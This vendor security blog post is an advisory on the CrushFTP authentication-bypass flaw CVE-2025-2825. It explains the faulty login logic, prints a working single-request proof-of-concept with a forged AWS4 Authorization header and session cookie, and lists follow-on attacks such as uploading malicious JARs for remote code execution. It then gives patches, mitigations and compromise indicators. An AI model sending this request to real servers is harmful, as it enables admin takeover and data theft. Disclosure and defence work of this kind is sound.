Go back to All Blog posts

Exploited ! CrushFTP Authentication-Bypass Vulnerability (CVE-2025-2825)

Amit Sheps
Amit Sheps Director of Product Marketing LinkedIn
April 23, 2025

CrushFTP—a Java-based, multi-protocol file-transfer server—ships with an Amazon S3–compatible API. A logic error in the method loginCheckHeaderAuth() ( ServerSessionHTTP.java ) mis-uses the Boolean flag lookup_user_pass: when the flag is true the server is supposed to look up a stored password, yet a later branch also interprets the same flag as “accept any password.”
An attacker can therefore send a single request containing an Authorization: AWS4-HMAC-SHA256 Credential=<user>/ header with no signature; the vulnerable code path sets anyPass=true, skips all subsequent checks, and returns a valid admin session cookie. Versions 10.0.0 – 10.8.3 and 11.0.0 – 11.3.0 are affected. The flaw was first published as CVE-2025-2825 and re-catalogued as CVE-2025-31161, but exploitability remains unchanged.

Exploit Methods

Below is a one-packet proof-of-concept that turns any unauthenticated visitor into the built-in crushadmin super-user:

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1

Host: victim.example.com:8081

Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111

Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

Walk-through

  1. Credential=crushadmin/ extracts the username.
  2. No tilde (~) appears, so lookup_user_pass stays true.
  3. Deeper in the call stack the same flag flips to anyPass=true, bypassing verify_user().
  4. A timestamp-token cookie that merely looks like CrushAuth=<13-digit>_<30-chars> is accepted without validation.

With this cookie the attacker may:

  • Invoke admin API calls such as putUser, getServerStatus, or writeFile.
  • Upload weaponised JARs to ${CrushFTP_HOME}/plugins/ and gain remote code execution.
  • Trigger scheduled jobs that execute arbitrary shell commands.

Potential Risk

  • Data theft – Steal confidential archives, source code, and database backups.
  • Data tampering – Replace installers or backups, poisoning supply chains or sabotaging recovery plans.
  • Ransomware deployment – Encrypt repositories and demand payment.
  • Lateral movement – Pivot from the CrushFTP host into flat internal networks.
  • Regulatory exposure – Immediate non-compliance with GDPR, HIPAA, PCI, and similar mandates.

Mitigation

  • Upgrade immediately
    • 10.x10.8.4 or newer
    • 11.x11.3.1 or newer (download via official wiki).
  • Network isolation
    • Place CrushFTP behind its DMZ proxy; expose only the proxy to the internet.
    • Restrict administrative ports to trusted IP addresses.
  • Disable unused S3 mode
    • Preferences → WebInterface → Disable AWS S3–style authentication.
  • Credential hygiene
    • Rotate all admin passwords; remove unknown accounts from users/MainUsers/.
  • Threat-hunt for compromise indicators
    • Log entries containing anyPass=true.
    • Files such as /tmp/mesch.exe, rogue JARs under plugins/, or newly scheduled tasks.
  • Apply the hardening flag (added in v11.3.1):
<!-- serverprefs.xml -->

<property name="s3_auth_lookup_password_supported">false</property>

Does CVE-2025-2825 impact me?

IONIX is actively tracking this vulnerability. Our research team has built a full exploit-simulation model that tests every discoverable CrushFTP endpoint—internal or external—against the known bypass. IONIX customers can view real-time, asset-level exposure details in the Threat Center of the IONIX portal.

WATCH A SHORT IONIX DEMO

See how easy it is to implement a CTEM program with IONIX. Find and fix exploits fast.

THE LATEST FROM IONIX

Amit Sheps
April 23, 2025
Exploited! Erlang/OTP SSH Unauthenticated Remote Code Execution Vulnerability (CVE-2025-32433)
Learn more
Amit Sheps
April 23, 2025
Exploited! Ingress-NGINX CONTROLLER FOR Ingress-NGINX RCE (CVE-2025-1974, 1097, 1098, 24514) – Patch Now | IONIX
Learn more
Amit Sheps
April 23, 2025
Exploited ! CrushFTP Authentication-Bypass Vulnerability (CVE-2025-2825)
Learn more